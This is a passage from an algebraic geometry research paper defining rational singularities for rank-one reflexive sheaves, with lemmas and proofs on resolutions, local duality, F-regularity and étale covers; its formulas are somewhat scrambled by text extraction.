+ and any reflexive sheaf F on X, F is a vector bundle outside codimension ≥ 2 closed
309
+ subscheme of X. See Lemma 0AY6 in [Stacks].
310
+ We will use the following lemmas without any mention. We believe that the three
311
+ following lemmas are well-known to experts but we can not find any reference about
312
+ them. Hence we include the proofs of them.
313
+ Lemma 3.6. Let X be any variety and ϕ : F → G any map between torsion-free sheaves
314
+ on X. Suppose that ϕ is an isomorphism outside codimension ≥ 1 closed subscheme of
315
+ X. Then ϕ is an injection.
316
+ Proof. Let K be the kernel of ϕ. Note that K is a subsheaf of a torsion-free sheaf F. By
317
+ the condition on ϕ, rank K = 0 and hence K = 0, because any subsheaf of torsion-free
318
+ sheaf is also torsion-free.
319
+
320
+ Lemma 3.7. Let X, X′ be any normal varieties and f : X′ → X any proper birational
321
+ morphism. Suppose that F is any reflexive sheaf on X. Then F ∼= f∗(f ∗F)DD.
322
+
323
+ 8
324
+ DONGHYEON KIM
325
+ Proof. Let us consider the adjunction property
326
+ HomOX(F, f∗(f ∗F)DD) ∼= f∗HomOX′(f ∗F, (f ∗F)DD)
327
+ and the map f ∗F → (f ∗F)DD.
328
+ Then we can construct the following map F →
329
+ f∗(f ∗F)DD.
330
+ Note that the map is an injection because it is an isomorphism on the
331
+ regular locus of X and F, f∗(f ∗F)DD are torsion-free sheaves.
332
+ Let Q be the cokernel. Then we have the following exact sequence
333
+ 0 → F → f∗(f ∗F)DD → Q → 0.
334
+ Note that the support of Q has codimension ≥ 2. Let x ∈ X be any point of codimension
335
+ ≥ 2. Then the local cohomology exact sequence tells us that H0
336
+ x(X, Q) = 0. Hence x is
337
+ not an associated point of Q. Thus Q = 0.
338
+
339
+ Lemma 3.8. Let X, Y be any normal varieties and p : X′ → X any proper flat mor-
340
+ phism. Suppose that F is any coherent sheaf on X. Then (p∗F)DD = p∗(F DD).
341
+ Proof. Note that the pullback of a reflexive sheaf along a flat morphism is also reflexive.
342
+ See Proposition 1.8 in [Har80].
343
+ Considering a natural map F → F DD, we have a map ϕ : (p∗F)DD → p∗(F DD). We
344
+ know that both (p∗F)DD, p∗(F DD) on Y are reflexive and ϕ is an isomorphism outside
345
+ codimension ≥ 2 closed subscheme of Y . Hence by [Har94], Proposition 1.11, we have
346
+ the assertion.
347
+
348
+ 4. Rational singularities
349
+ From this section and to the end of the paper, any reflexive sheaf is assumed to be of
350
+ rank 1 unless otherwise stated.
351
+ Proposition 4.1. Let X be any normal variety and F any reflexive sheaf on X. Suppose
352
+ that f : X′ → X is a resolution. Then we have a natural map
353
+ θF,f : Rf∗(f ∗F)D → RHomOX(F, ω•
354
+ X)[− dim X]
355
+ Moreover, the following are equivalent:
356
+ (a) θF,f is a quasi-isomorphism.
357
+ (b) Rif∗(f ∗F)DD = 0 for i ≥ 1.
358
+ (c) The natural map
359
+ Hi
360
+ x(Xx, Fx) → Hi
361
+ f−1(x)(X′
362
+ x, (f ∗F)DD
363
+ x
364
+ )
365
+ is an isomorphism for each i ≥ 0 and each point x ∈ X.
366
+ Proof. Note that the proof of Lemma 3.7 is inspired by the argument in the proof in
367
+ [ST08].
368
+ Let us prove (a) ⇐⇒ (b). Consider a map F ∼= f∗(f ∗F)DD → Rf∗(f ∗F)DD. We may
369
+ take RHomOX(−, ω•
370
+ X) on the map and it gives
371
+ RHomOX(Rf∗(f ∗F)DD, ω•
372
+ X) → RHomOX(F, ω•
373
+ X).
374
+
375
+ RATIONAL SINGULARITIES AND q-BIRATIONAL MORPHISM
376
+ 9
377
+ Now, we may compute the left-hand side by the Grothendieck duality. Indeed,
378
+ RHomOX(Rf∗(f ∗F)DD, ω•
379
+ X) = Rf∗RHomOX′((f ∗F)DD, ωX′)[dim X]
380
+ = Rf∗HomOX′((f ∗F)DD, ωX′)[dim X]
381
+ = Rf∗(f ∗F)D[dim X],
382
+ where we used the fact that (f ∗F)DD is a line bundle on X′ on the second equality.
383
+ Hence we have a map
384
+ θF,f : Rf∗(f ∗F)D → RHomOX(F, ω•
385
+ X)[− dim X].
386
+ If (b) is true, then F ∼= Rf∗(f ∗F)DD. Thus θF,f is a quasi-isomorphism and (a) is true.
387
+ For the converse, we may take RHomOX(−, ω•
388
+ X) on θF,f. See 0AU3 (3) in [Stacks].
389
+ For (a) ⇐⇒ (c), we may take the local duality to θF,f. Indeed, the dual of θF,f is
390
+ RΓx(Xx, Fx) → RΓx(Xx, Rf∗(f ∗F)DD)
391
+ and the right hand side is RΓf−1({x})(X′
392
+ x, (f ∗F)DD) by the Leray spectral sequence.
393
+
394
+ Remark 4.2. If we use the notions of Proposition 4.1, H0(θF,f) is
395
+ H0(θF,f) : f∗(f ∗F)D → F D = HomOX(F, ωX).
396
+ If we let F = OX, then H0(θF,f) is the trace map introduced in [KM98], Proposition
397
+ 5.77.
398
+ Definition 4.3. Let X be any normal variety and F any reflexive sheaf on X. We say
399
+ that F has weak rational singularities if one of the conditions in Proposition 1.1 is true
400
+ for the F and for any resolution f : X′ → X.
401
+ It is worth saying that for characteristic 0 case, the choice of resolution is not important
402
+ to the definition of weak rational singularities.
403
+ Proposition 4.4. Let X be any normal variety over a characteristic 0 field and F any
404
+ reflexive sheaf on X. Then F has weak rational singularities if and only if for some
405
+ resolution f : X′ → X, Rif∗(f ∗F)DD = 0 for i ≥ 1.
406
+ Proof. For the if direction, let g : X′′ → X be a resolution.
407
+ Our goal is to show
408
+ Rig∗(g∗F)DD = 0 for i ≥ 1. Let us choose any common resolution
409
+ X′′′
410
+ X′
411
+ X′′
412
+ X.
413
+ f′
414
+ g′
415
+ f
416
+ g
417
+ We may consider the following maps
418
+ (f ◦ f ′)∗F → (f ′)∗(f ∗F)DD → ((f ◦ f ′)∗F)DD.
419
+
420
+ 10
421
+ DONGHYEON KIM
422
+ By taking double dual on the maps, we have maps
423
+ ((f ◦ f ′)∗F)DD → (f ′)∗(f ∗F)DD → ((f ◦ f ′)∗F)DD.
424
+ Note that the composition is the identity. Since the above maps are injections, we have
425
+ (f ′)∗(f ∗F)DD = ((f ◦ f ′)∗F)DD.
426
+ Consider the following spectral sequence
427
+ Est
428
+ 2 = Rsf∗Rt(f ′)∗(f ′)∗(f ∗F)DD =⇒ Rs+t(f ◦ f ′)(f ∗((f ′)∗F)DD),
429
+ by the fact that Ri(f ′)∗OX′′′ = 0 for i ≥ 1 and the projection formula, we have
430
+ Rif∗(f ∗F)DD = Ri(f ◦ f ′)∗((f ◦ f ′)∗F)DD for i ≥ 0.
431
+ In the same way, we have
432
+ Rig∗(g∗F)DD = Ri(g ◦ g′)∗((g ◦ g′)∗F)DD for i ≥ 0.
433
+ Hence, we have the assertion. The only if direction is trivial.
434
+
435
+ Remark 4.5. We can not prove the above proposition on a positive characteristic field
436
+ because the existence of a common resolution is largely unknown in such a setting. If X
437
+ is threefold, we can prove the above proposition.
438
+ Lemma 4.6. Let X be any normal variety and F any reflexive sheaf on X which has
439
+ weak rational singularities.
440
+ Then for any resolution f : X′ → X, the following are
441
+ equivalent:
442
+ (a) F is (Sq+1).
443
+ (b) The support of Rif∗(f ∗F)D has codimension ≤ i + q + 1 for any i ≥ 1 and for
444
+ some resolution f : X′ → X of X.
445
+ (c) The support of Rif∗(f ∗F)D has codimension ≤ i + q + 1 for any i ≥ 1 and any
446
+ resolution f : X′ → X of X.
447
+ Proof. For (a) =⇒ (c), by our assumption, there is an isomorphism
448
+ θF,f : Rf∗(f ∗F)D ∼= RHomOX(F, ω•
449
+ X)[− dim X].
450
+ Moreover, for any point x ∈ X with codimX x ≤ i + q, HcodimX x−i
451
+ x
452
+ (X, F) = 0 holds,
453
+ because F is (Sq+1). Hence, by the local duality, Ext− codimX x+i
454
+ OX,x
455
+ (Fx, ω•
456
+ X,x) = 0 for such i.
457
+ Thus, Rif∗(f ∗F)D
458
+ x = 0 and the support of Rif∗(f ∗F)D does not contain x. (c) =⇒ (b)
459
+ is trivial.
460
+ For (b) =⇒ (a), let us consider a point x ∈ X. If codimX x ≤ q, then Rif∗(f ∗F)D
461
+ x = 0
462
+ and Ext− codimX x+i
463
+ OX,x
464
+ (Fx, ω•
465
+ X,x) = 0 hold for any i ≥ 1. Hence, the local duality gives
466
+ HcodimX x−i
467
+ x
468
+ (X, F) = 0 for any i ≥ 1.
469
+ If codimX x ≥ q + 1 and Rif∗(f ∗F)D
470
+ x = 0, by the local duality, HcodimX x−i
471
+ x
472
+ (X, F) = 0.
473
+ Moreover, if codimX x − i < q, then Rif∗(f ∗F)D
474
+ x = 0. Hence, for 0 ≤ j < q, Hj
475
+ x(X, F) =
476
+ 0.
477
+
478
+
479
+ RATIONAL SINGULARITIES AND q-BIRATIONAL MORPHISM
480
+ 11
481
+ Corollary 4.7. Let X be any normal variety and F any reflexive sheaf on X which has
482
+ weak rational singularities. Then the following are equivalent:
483
+ (a) F is CM.
484
+ (b) For a resolution f : X′ → X, Rif∗(f ∗F)D = 0 for i ≥ 1.
485
+ (c) For any resolution f : X′ → X, Rif∗(f ∗F)D = 0 for i ≥ 1.
486
+ Now, we can define the notion of rational singularities for any reflexive sheaf of rank
487
+ 1.
488
+ Definition 4.8. Let X be any normal variety, F any reflexive sheaf on X.
489
+ (a) We say that F has rational singularities if F has weak rational singularities and
490
+ one of the conditions in Corollary 4.7 is true for any resolution f : X′ → X.
491
+ (b) We say that a Weil divisor D on X has rational singularities if OX(D) has rational
492
+ singularities.
493
+ (c) We say that F is (KVq) if for any resolution f : X′ → X, the support of
494
+ Rif∗(f ∗F)D has dimension ≥ i + q + 1 for any i ≥ 1.
495
+ Remark 4.9. The above definitions are similar to Definition 2.5 in [Kov11] and Definition
496
+ 2.78 in [Kol13]. However, there are four main differences.
497
+ • We used double dual to define the notion of rational singularities instead of strict
498
+ transform. Thus the notion of normal pair in [Kov11] is unnecessary.
499
+ • It is obvious that some Cartier divisor on X has rational singularities in our
500
+ sense if and only if X has rational singularities. In contrast to our notion, it
501
+ is far from obvious that for some reduced, effective and Cartier divisor D on
502
+ X, (X, D) has rational singularities in the sense of [Kov11] if and only if X has
503
+ rational singularities. For the only if assertion, see Corollary 2.13 in [Kov11].
504
+ Note that the proof of Corollary 2.13 in [Kov11] implicitly used our notion of
505
+ rational singularities.
506
+ • Moreover, we defined the notion of rational singularities for any reflexive sheaf of
507
+ rank 1, not only for reduced Weil divisor.
508
+ • It seems hard to believe a good restriction of a reflexive sheaf with rational
509
+ singularities also has rational singularities unlike Remark 2.85 in [Kol13] because
510
+ our notion is for reflexive sheaves. For treating this problem, one may consider a
511
+ combination of our notion and the notion of [Kov11].
512
+ Remark 4.10. If k is of characteristic 0 and F ∼= OX(D) for some Q-Cartier Weil divisor
513
+ D, we have (f ∗OX(D))D ∼= OX′(KX′ − L) for some Cartier divisor L on X′ and for
514
+ such L, f ∗D ∼Q L. In that setting, −L is f-nef and the relative Kawamata-Viehweg
515
+ vanishing theorem tells us that Rif∗(f ∗F)D = 0 for i ≥ 1. Hence, for such F, having
516
+ weak rational singularities and having rational singularities are the same.
517
+ Example 4.11. If k is of characteristic 0 and F ∼= OX(D) where D is a Weil divisor
518
+ on X which is not Q-Cartier, then having weak rational singularities does not ensure
519
+ having rational singularities.
520
+
521
+ 12
522
+ DONGHYEON KIM
523
+ For example, take X := Spec k[x, y, z, w]/(xy−zw), A := {x = z = 0}, the blowup f :
524
+ X′ → X along A and the exceptional divisor E on X′. We know that f is a small resolu-
525
+ tion and (f ∗OX(−mA))DD = OX′(−mE). Then for m ≫ 0, Rif∗(f ∗OX′(−mA))DD = 0
526
+ for i ≥ 1. Thus −mA has weak rational singularities. However, for m ≥ 2, −mA is not
527
+ CM as in (3.15) in [Kol13] and hence −mA does not have rational singularities.
528
+ Let us prove the following lemma. Similar statements are proved in Lemma 3.2 in
529
+ [Ale08] and Theorem 7.1.1 in [Fuj17].
530
+ Lemma 4.12. Let f : X′ → X be any proper birational morphism of varieties and F, F ′
531
+ any coherent sheaves on X′. For any given positive integer n ≥ 1, suppose the three
532
+ conditions hold:
533
+ (1) There is an injection ı : F → F ′,
534
+ (2) ı induces an isomorphism f∗F ∼= f∗F ′, and
535
+ (3) Rif∗F ′ = 0 for 1 ≤ i < n.
536
+ Then we have Rif∗F = 0 for 1 ≤ i < n.
537
+ Proof. Fix any point x ∈ X and consider the following two spectral sequences
538
+ 1Est
539
+ 2 = Hs
540
+ x(X, Rtf∗F) =⇒ Hi+j
541
+ f−1(x)(X′, F),
542
+ 2Est
543
+ 2 = Hs
544
+ x(X, Rtf∗F ′) =⇒ Hi+j
545
+ f−1(x)(X′, F ′).
546
+ By (3), we have 2Ei0
547
+ 2 = 2Ei0
548
+ ∞ and hence the edge map 2Ei0
549
+ 2 → 2Ei is an injection for any
550
+ 0 ≤ i ≤ n. If we use (1), then there is a diagram
551
+ 1Ei = Hi
552
+ f−1(x)(X′, F)
553
+ 2Ei = Hi
554
+ f−1(x)(X′, F ′)
555
+ 1Ei0
556
+ 2 = Hi
557
+ x(X, f∗F)
558
+ 2Ei0
559
+ 2 = Hi
560
+ x(X, f∗F ′)
561
+ γi
562
+ αi
563
+ βi
564
+ By (2), γi is an isomorphism for any i. Since βi is an injection for 1 ≤ i ≤ n, αi is also
565
+ an injection for such i.
566
+ Now, we may use induction.
567
+ Indeed, suppose for a positive integer 1 < n′ ≤ n,
568
+ Rif∗F = 0 for 1 ≤ i < n′. Our goal is to show Rn′f∗F = 0. By the induction hypothesis,
569
+ we have 1E0n′
570
+ 2
571
+ = 1E0n′
572
+ n
573
+ and 1E(n′+1)0
574
+ 2
575
+ = 1E(n′+1)0
576
+ n
577
+ . Hence, there is an exact sequence
578
+ 0 → 1E0n′
579
+ 2
580
+ → 1E(n′+1)0
581
+ 2
582
+ βn′+1
583
+
584
+ 1En′+1.
585
+ Since βn′+1 is an isomorphism, we have H0
586
+ x(X, Rn′+1f∗F) = 1E(n′+1)0
587
+ 2
588
+ = 0 and hence
589
+ Rn′+1f∗F does not have an associated point as x. Thus Rn′+1f∗F = 0 and we have the
590
+ assertion.
591
+
592
+ Now, we have an alternative description of the definition of rational singularities.
593
+ Proposition 4.13. Let X be any normal variety and F any reflexive sheaf on X. Then
594
+ F has rational singularities if and only if for any resolution f : X′ → X, there is a line
595
+ bundle LF,f on X′ such that the three following conditions hold:
596
+
597
+ RATIONAL SINGULARITIES AND q-BIRATIONAL MORPHISM
598
+ 13
599
+ (i) f∗LF,f = F,
600
+ (ii) Rif∗LF,f = 0 for i ≥ 1, and
601
+ (iii) Rif∗LD
602
+ F,f = 0 for i ≥ 1.
603
+ Proof. For the only if direction, set LF,f := (f ∗F)DD.
604
+ For the if direction, let us consider the counit map f ∗f∗LF,f → LF,f. By taking double
605
+ dual, we have an injection (f ∗f∗LF,f)DD → LF,f. Since (i) holds, f ∗f∗LF,f = f ∗F and
606
+ hence (f ∗f∗LF,f) = (f ∗F)DD. Thus, there is an injection (f ∗F)DD → LF,f.
607
+ Considering Lemma 4.12, (i) and (ii), we have Rif∗(f ∗F)DD = 0 for i ≥ 1. Let us use
608
+ the notations in Lemma 4.12. By (iii) and Lemma 2.6, we have
609
+ Hi
610
+ f−1(x)(X, LF,f) = 0 for i < codimX x.
611
+ Since βi is an isomorphism for i ≥ 1, we have
612
+ Hi
613
+ x(X, F) = Hi
614
+ f−1(x)(X′, LF,f) = 0 for i < codimX x
615
+ and hence F is CM. Thus F has rational singularities.
616
+
617
+ Remark 4.14. Proposition 4.13 means that for any normal variety X and any reduced
618
+ Weil divisor D on X, if (X, D) has rational singularities in the sense of [Kov11], then
619
+ −D has rational singularities in our sense.
620
+ Now, we may consider the following two properties.
621
+ Proposition 4.15. Let X any normal variety over a characteristic 0 field, ∆ any ef-
622
+ fective Q-Weil divisor such that (X, ∆) is klt and D any Q-Cartier Weil divisor on X.
623
+ Then D has rational singularities.
624
+ Proof. Indeed, suppose f : X′ → X is any resolution of X and KX′ ∼Q f ∗(KX + ∆) +
625
+ F − F ′, where F is an effective, f-exceptional Cartier divisor and F ′ is a simple normal
626
+ crossing divisor with ⌊F ′⌋ = 0. Then F ∼Q KX′ − f ∗(KX + ∆) + F ′. If we let a divisor
627
+ L on X′ in which OX′(L) = (f ∗OX′(D))DD holds, we have
628
+ F + L ∼Q KX′ + F ′ + (f ∗D − f ∗(KX + ∆)).
629
+ Hence by the relative Kawamata-Viehweg vanishing theorem, Rif∗OX(F +L) = 0. If we
630
+ consider the injection OX(L) → OX(F + L), we have Rif∗OX(L) = 0 by Lemma 4.12
631
+ and hence D has rational singularities.
632
+
633
+ Remark 4.16. Note that Proposition 4.15 is a generalization of Corollary 5.25 in [KM98]
634
+ and the proof does not require the cyclic covering theory.
635
+ Proposition 4.17. Let X any strongly F-regular variety over a field of characteristic
636
+ p > 0 and D any Weil divisor such that there is an integer r such that rD is linearly
637
+ equivalent to a Cartier divisor and r is relatively prime to p.
638
+ Then D has rational
639
+ singularities.
640
+
641
+ 14
642
+ DONGHYEON KIM
643
+ Proof. Since having rational singularities is a local property, we may assume X := Spec R
644
+ is an affine scheme and rD ∼ 0. Moreover, by multiplying some integer on r, we may
645
+ take r = pe − 1 for sufficiently large e. Let x ∈ X be a point of X and f : X′ → X any
646
+ resolution. We follow the proof of Theorem 3.1 in [PS14].
647
+ We may equip an endomorphism F e
648
+ ∗ : HcodimX x
649
+ x
650
+ (X, OX(D)) → HcodimX x
651
+ x
652
+ (X, OX(D))
653
+ on HcodimX x
654
+ x
655
+ (X, OX(D)) as an endomorphism of an abelian group. Indeed, if we consider
656
+ the inclusion OX ⊆ F e
657
+ ∗OX, by tensoring OX(D) and reflexing, we have a map OX(D) →
658
+ F e
659
+ ∗ OX(peD). Since (pe −1)D ∼ 0 holds, we have a map OX(D) → F e
660
+ ∗ OX(D). Taking lo-
661
+ cal cohomology gives the desired map. Let us call a submodule K ⊆ HcodimX x
662
+ x
663
+ (X, OX(D))
664
+ F-stable if F e
665
+ ∗(K) ⊆ K.
666
+ Let K ⊊ HcodimX x
667
+ x
668
+ (X, OX(D)) be any F-stable submodule of HcodimX x
669
+ x
670
+ (X, OX(D))
671
+ and let c ∈ AnnRK be any nontrivial element of AnnRK. Note that such an element
672
+ exists because of the Matlis duality.
673
+ Indeed, if R∧ is the completion of R along x,
674
+ N∧ := R∧N for any R-module N and N′ is the R-module corresponding to OX(D), the
675
+ inclusion K ⊊ HcodimX x
676
+ x
677
+ (X, OX(D)) gives us a surjection
678
+ HomR∧((N′)∧, ωR∧) → HomR∧(K∧, E),
679
+ where E is the injective hull of R∧ (see Theorem 3.5.8 in [BH98]). Since ωR∧, (N′)∧ are
680
+ torsion-free,
681
+ 0 ̸= AnnR∧(HomR∧(K∧, E)) = AnnR∧(K∧).
682
+ Now, consider Lemma 07T8 in [Stacks] (note that the natural map R → R∧ is a flat
683
+ map).
684
+ Since X is strongly F-regular, there is a positive integer e′ and a map ϕ : F e′
685
+ ∗ OX → OX
686
+ such that the composition
687
+ (4.1)
688
+ OX → F e′
689
+ ∗ OX
690
+ F e′
691
+ ∗ (·c)
692
+
693
+ F e′
694
+ ∗ OX
695
+ ϕ→ OX
696
+ is the identity. We may assume e|e′ and hence (pe − 1)|(pe′ − 1). Twisting by OX(D)
697
+ and reflexing on (4.1), we have the following composition which is the identity
698
+ OX(D) → F e′
699
+ ∗ OX(pe′D) ∼= F e′
700
+ ∗ OX(D) → F e′
701
+ ∗ OX(pe′D) ∼= F e′
702
+ X OX(D) → OX(D).
703
+ Now, taking local cohomology gives us
704
+ HcodimX x
705
+ x
706
+ (X, OX(D))
707
+ →HcodimX x
708
+ x
709
+ (X, F e′
710
+ ∗ OX(D))
711
+ F e′
712
+ ∗ (·c)
713
+ → HcodimX x
714
+ x
715
+ (X, F e′
716
+ ∗ OX(D))
717
+ →HcodimX x
718
+ x
719
+ (X, OX(D)).
720
+ Since K is F-stable and cK = 0 holds, K = 0.
721
+ We may mimic the strategy of Smith (see [Smi97], Theorem 3.1). Now, consider the
722
+ Leray spectral sequence
723
+ (4.2)
724
+ Est
725
+ 2 = Hs
726
+ x(X, Rtf∗(f ∗OX(D))DD) =⇒ Hs+t
727
+ f−1(x)(X′, (f ∗OX(D))DD)
728
+
729
+ RATIONAL SINGULARITIES AND q-BIRATIONAL MORPHISM
730
+ 15
731
+ and its edge map δD : HcodimX x
732
+ x
733
+ (X, OX(D)) → HcodimX x
734
+ f−1(x)
735
+ (X, (f ∗OX(D))DD). Let KD be
736
+ the kernel of δD. If we consider Proposition 1.12 in [Smi97] and set ψ by
737
+ ψ : (f ∗OX(D))DD → F e
738
+ ∗ (f ∗OX(peD))DD,
739
+ we have a diagram
740
+ HcodimX x
741
+ f−1(x)
742
+ (X′, (f ∗OX(D))DD)
743
+ HcodimX x
744
+ f−1(x)
745
+ (X′, (f ∗OX(D))DD)
746
+ HcodimX x
747
+ x
748
+ (X, OX(D))
749
+ HcodimX x
750
+ x
751
+ (X, OX(D))
752
+ F e
753
+
754
+ F e
755
+
756
+ δD
757
+ δD
758
+ by considering the argument in the proof of Theorem 3.1 in [Smi97] almost unchangingly.
759
+ For any c ∈ KD, δD(F e
760
+ ∗ (c)) = F e
761
+ ∗(δD(c)) = 0 and hence KD is F-stable.
762
+ Therefore
763
+ KD = 0. It means δD is an injection.
764
+ We may use induction. Suppose n ≥ 2 is an integer and assume Rif∗(f ∗OX(D))DD = 0
765
+ for 1 ≤ i < n − 1. Then by inspecting (4.2), we have an exact sequence
766
+ 0 → H0
767
+ x(X, Rn−1f∗(f ∗OX(D))DD) → Hn
768
+ x(X, OX(D))
769
+ δn,D
770
+ → Hn
771
+ f−1(x)(X′, (f ∗OX(D))DD).
772
+ For n < codimX x, we know OX(D) is CM by Theorem 3.2 in [PS14] and hence
773
+ δn,D is an injection. Moreover, we have proven that δcodimX x,D is an injection. Thus,
774
+ H0
775
+ x(X, Rnf∗(f ∗OX(D))DD) = 0 and Rnf∗(f ∗OX(D))DD does not have an associated
776
+ point as x. This argument works for any point x ∈ X and therefore Rn−1f∗(f ∗OX(D))DD =
777
+ 0. By considering Proposition 4.1, D has weak rational singularities.
778
+ The remaining is to show Rif∗(f ∗OX(D))D = 0 for i ≥ 1. By Lemma 2.6, it suffices
779
+ to show HcodimX x−i
780
+ f−1(x)
781
+ (X′, (f ∗OX(D))DD) = 0 for i ≥ 1. If we consider (4.2), Est
782
+ 2 = 0 for
783
+ s + t < codimX x and hence EcodimX x−i = 0 and that is the assertion.
784
+
785
+ Example 4.18. Let us consider what happens to klt varieties over a positive charac-
786
+ teristic field. On the positive side, suppose X is any normal threefold over a field of
787
+ characteristic p > 5. Assume that there is an effective Q-divisor ∆ on X such that
788
+ (X, ∆) is klt. If we consider Theorem 3 in [BK21], in the same way as Proposition 4.15,
789
+ we can prove that X has rational singularities.
790
+ There is a question of whether any
791
+ Q-Cartier Weil divisor on X has rational singularities.
792
+ On the negative side, if the characteristic of k is 3, then there is an example of klt
793
+ Q-factorial threefold X such that X does not have rational singularities (see Theorem
794
+ 1.2 in [Ber21]). Moreover, for any prime number p > 2 and any field k with characteristic
795
+ p, there is an example of variety with terminal singularities which does not have rational
796
+ singularities (see Corollary 2.2 in [Tot19]).
797
+ Let us prove that having rational singularities is stable under finite ´etale morphism.
798
+ We believe it might be a partial answer to Remark 2.81 (3) in [Kol13].
799
+
800
+ 16
801
+ DONGHYEON KIM
802
+ Proposition 4.19. Let X, Y be normal varieties over characteristic 0 field, p : Y → X
803
+ any finite ´etale morphism and F any reflexive sheaf on X. If p∗F has (resp. weak)
804
+ rational singularities, then F has (resp. weak) rational singularities.
805
+ Proof. By the functoriality of resolution of singularities (see Theorem 3.36 in [Kol07]),
806
+ for some resolution f : X′ → X, there is a resolution f ′ : Y ′ → Y such that f, f ′ fit in
807
+ the following Cartesian diagram:
808
+ Y ′ ∼= X′ ×X Y
809
+ Y
810
+ X′
811
+ X.
812
+ p′
813
+ f′
814
+ p
815
+ f
816
+ Note that p′ is finite ´etale because being finite ´etale is stable under base change (see
817
+ Lemma 01TS and Lemma 02GO in [Stacks]). Moreover, for any coherent sheaf H on
818
+ X′, we have a split injection H → (p′)∗(p′)∗H. Indeed, let n be the degree of p. If we
819
+ let (p′)!H := HomOX′(p∗OY ′, H) as in Exercises 3.6.10 in [Har77], by the trace
820
+ 1
821
+ nTr :
822
+ (p′)∗(p′)∗OY ′ → OX′ which is a right inverse of the natural map ϕ : OX′ → p∗OY ′,
823
+ we have a split injection HomOX′
824
+ � 1
825
+ nTr, H
826
+
827
+ : H → (p′)∗(p′)!H whose right inverse is
828
+ HomOX′(ϕ, H). Now, by Lemma 0FWI in [Stacks], p∗ = p! and we are done.
829
+ Note that for any coherent sheaf G on Y , Rip∗G = 0 for i ≥ 1 by Lemma 02OE in
830
+ [Stacks]. Now, we consider the following two Grothendieck spectral sequences
831
+ 1Est
832
+ 2 = Rsp∗(Rt(f ′)∗((f ′)∗(p∗F))DD) =⇒ Rs+t(p ◦ f ′)∗((f ′)∗(p∗F))DD
833
+ 2Est
834
+ 2 = Rsf∗(Rt(p′)∗((p′)∗(f ∗F)DD)) =⇒ Rs+t(f ◦ p′)∗((p′)∗(f ∗F)DD).
835
+ Note that
836
+ ((f ′)∗(p∗F))DD = ((p ◦ f ′)∗F)DD = ((f ◦ p′)∗F)DD = ((p′)∗(f ∗F))DD = (p′)∗(f ∗F)DD.
837
+ Hence, by inspecting the spectral sequences, we have
838
+ p∗(Ri(f ′)∗((f ′)∗(p∗F))DD) = Rif∗((p′)∗((p′)∗(f ∗F)DD))
839
+ for any i ≥ 0.
840
+ Suppose p∗F has weak rational singularities that Ri(f ′)∗((f ′)∗(p∗F))DD = 0 for i ≥ 1.
841
+ Then Rif∗((p′)∗((p′)∗(f ∗F)DD)) = 0 for i ≥ 1. By the splitting
842
+ (4.3)
843
+ (f ∗F)DD → (p′)∗(p′)∗(f ∗F)DD → (f ∗F)DD
844
+ and taking Rif∗ on (4.3), we also have Rif∗(f ∗F)DD = 0 for i ≥ 1. Therefore F has
845
+ weak rational singularities.
846
+ Let us prove that if p∗F is CM, then F is CM. Note that p is finite and faithfully flat.
847
+ By Lemma 00LM in [Stacks], for any point x ∈ X, any regular sequence of Fx comes
848
+ from a regular sequence of Fy, where p(y) = x. Thus, we have the assertion.
849
+
850
+
851
+ RATIONAL SINGULARITIES AND q-BIRATIONAL MORPHISM
852
+ 17
853
+ Remark 4.20. We hope Proposition 4.19 is true for any field k which can be of positive
854
+ characteristic. The difficulty is there may be no splitting H → (p′)∗(p′)∗H → H if the
855
+ degree of p is coprime to the characteristic of k.
856
+ If p is a quotient by a finite group which may not be ´etale, the major problem for
857
+ proving Proposition 4.19 is we cannot ensure the equality (p′)∗(f ∗F)DD = (p′)∗(f ∗F)DD.
858
+ Now, we define the following notion.
859
+ Definition 4.21. Let X be any normal variety and F any reflexive sheaf on X. We
860
+ say that F is (RSq) if for any point x ∈ X with codimX x ≤ q and any resolution
861
+ f : X′ → X, θF,f is a quasi-isomorphism after localizing θF,f at x.
862
+ Remark 4.22. In Definition 4.21, F is (RSdim X) if and only if F has rational singularities
863
+ and it is Corollary 4.7. Also in Definition 4.21, condition (b) is equivalent to the following:
864
+ For any i ≥ 1, Rif∗(f ∗F)DD has the support of codimension ≥ q + 1.
865
+ Lemma 4.23. Let X be any normal variety and F any reflexive sheaf on X. If X is
866
+ (Rq), then F is (RSq).
867
+ Proof. Let f : X′ → X be any resolution. By dualizing θF,f, it suffices to show that
868
+ Rif∗(f ∗F)DD has the support of codimension ≥ q + 1 for i ≥ 1. For any point x ∈ X
869
+ with codimX x ≤ q, Fx = OX,x and hence (Rif∗(f ∗F))DD
870
+ x
871
+ = (Rif∗OX)x for i ≥ 0. Thus,
872
+ by Theorem 1.1 in [CR15], we have the assertion.
873
+
874
+ Example 4.24. We can give examples of reflexive sheaf with (RSq). Indeed, X be any
875
+ normal variety over C and suppose ∆ is an effective Weil divisor such that (X, ∆) is
876
+ log canonical. If D is a Q-Cartier Weil divisor on X, then D is (RSq+1), where q is the
877
+ codimension of the union of the non-klt centers of (X, ∆).
878
+ It would be interesting to know whether any closed subvariety defined by the points
879
+ x ∈ X in which (θF,f)x is not a quasi-isomorphism for some resolution f : X′ → X is a
880
+ non-klt center of (X, ∆) or not. Note that if D = 0, there is an affirmative answer. See
881
+ Theorem 1.2 in [AH12].
882
+ 5. Notion of (Bq+1)
883
+ This section introduces the notion of (Bq+1).
884
+ Definition 5.1. Let X be any normal variety and F any reflexive sheaf on X. We say
885
+ F is (Bq+1) if Hi
886
+ x(X, F) = 0 for any dim X − q < i < dim X and closed point x ∈ X.
887
+ For any normal variety X, X is CM if and only if ωX is CM by Lemma 0AWS in
888
+ [Stacks]. However, for q < dim X − 1, it is not true that X is (Sq+1) if and only if ωX is
889
+ (Sq+1). It seems to us that the correct notion for ωX is (Bq+1), not (Sq+1) (for a more
890
+ discussion, see (4.3) in [Kol11]).
891
+ Theorem 5.2. Let X be any normal projective variety and F any reflexive sheaf on X,
892
+ which is (RSq) and (KVq). Then the following are equivalent:
893
+
894
+ 18
895
+ DONGHYEON KIM
896
+ (a) F is (Sq+1).
897
+ (b) For any resolution f : X′ → X such that for any 1 ≤ i < q, Rif∗(f ∗F)DD = 0.
898
+ (c) F D is (Bq+1).
899
+ Proof. Let f : X′ → X be any resolution of X. For (a) =⇒ (b), as Proposition 4.15,
900
+ we may consider the following spectral sequence
901
+ (5.1)
902
+ Est
903
+ 2 = Hs
904
+ x(X, Rtf∗(f ∗F)DD) =⇒ Hs+t
905
+ f−1(x)(X′, (f ∗F)DD).
906
+ We may use induction. Indeed, let us fix any positive integer 2 ≤ n ≤ q and assume
907
+ that Rif∗(f ∗F)DD = 0 for 1 ≤ i < n − 1.
908
